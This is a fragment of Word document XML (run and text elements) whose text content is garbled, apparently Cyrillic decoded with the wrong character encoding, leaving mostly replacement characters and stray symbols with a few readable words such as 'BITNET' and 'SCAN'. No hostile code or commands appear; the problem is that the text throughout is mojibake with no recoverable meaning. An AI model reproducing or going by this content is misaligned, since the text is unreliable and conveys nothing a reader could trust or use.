        <w:t>"���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ଠ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>樮���� �����樨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㯠 � ����⨢��� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ଠ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>樨 �� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᠬ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>࠭��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">饩�� �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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>BITNET, ���� �� �����, ���⮬� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ਢ����� ᢥ����� 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拉 ��砥� � ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">(� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮦ������ ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢮ �����⮢�� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㬥��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SCAN, ���, ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">祬 � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᠬ�� �ணࠬ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ��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業��� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>祬 㤮���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢮�⥫</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>쭮�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>: � ��� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ਢ������ 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ᢥ����� �� �������� ����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